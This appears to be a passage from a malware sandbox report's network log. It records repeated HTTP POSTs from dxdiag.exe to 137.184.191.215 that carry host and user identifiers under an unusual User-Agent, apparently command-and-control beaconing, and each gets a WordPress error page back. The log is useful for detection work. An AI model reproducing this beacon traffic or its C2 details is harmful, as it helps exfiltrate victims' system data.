                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:42.347712994 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:42.347723961 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.749733137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:42.493664980 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:42.498444080 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:45.146161079 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:42 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:45.146215916 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                      Oct 1, 2024 07:45:45.146253109 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                      Oct 1, 2024 07:45:45.146289110 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.749734137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:45.293193102 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:45.298134089 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:48.020323038 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:45 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:48.020347118 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:48.020358086 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.749735137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:48.380528927 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:48.385313988 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:50.982450962 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:48 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:50.982467890 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:50.982481003 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.749736137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:51.244790077 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:51.251136065 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:53.802278996 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:51 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:53.802290916 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                      Oct 1, 2024 07:45:53.802298069 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                      Oct 1, 2024 07:45:53.802673101 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.749737137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:54.094350100 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:54.100526094 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:56.725964069 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:54 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
